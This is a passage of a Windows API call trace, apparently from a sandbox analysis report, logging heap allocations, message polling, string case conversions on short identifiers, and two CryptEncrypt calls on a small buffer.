(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0224.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0224.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0224.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0224.340] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0224.340] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0224.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0224.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17c) returned 0x50e0048 [0224.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0224.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0224.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0224.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab728 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0224.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17c) returned 0x50e0358 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0224.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0224.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0224.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0224.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0224.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0224.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0224.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0224.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0224.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0224.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0224.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0224.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0224.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0224.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0224.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0224.342] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0224.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0224.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0224.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0224.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0224.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0224.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0224.343] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0224.343] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0224.343] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0224.343] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0224.343] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0224.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0224.344] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0224.344] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.344] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0224.344] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0224.344] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0224.344] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0224.344] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.344] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0224.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0224.345] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0224.345] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0224.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0224.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0224.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0224.345] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.345] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.345] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.345] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.345] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0224.345] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.345] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0224.345] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.345] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.345] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.345] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.345] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.346] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.346] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.346] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.346] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0224.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0224.346] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x17c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x180) returned 1 [0224.346] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.346] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.346] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.346] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.346] CharLowerBuffW (in: lpsz="byte[384]", cchLength=0x9 | out: lpsz="byte[384]") returned 0x9 [0224.346] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.346] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.347] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.347] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.347] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.347] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.347] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.347] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0224.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabcf8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0224.347] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x50e04e0*, pdwDataLen=0x8cef60*=0x17c, dwBufLen=0x180 | out: pbData=0x50e04e0*, pdwDataLen=0x8cef60*=0x180) returned 1 [0224.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.347] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0224.347] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.347] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0224.347] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.347] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.348] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0224.348] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.348] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0224.348] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.348] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.348] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.348] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.348] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0224.348] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.348] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0224.348] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.348] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.348] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.348] PeekMessageW (in: 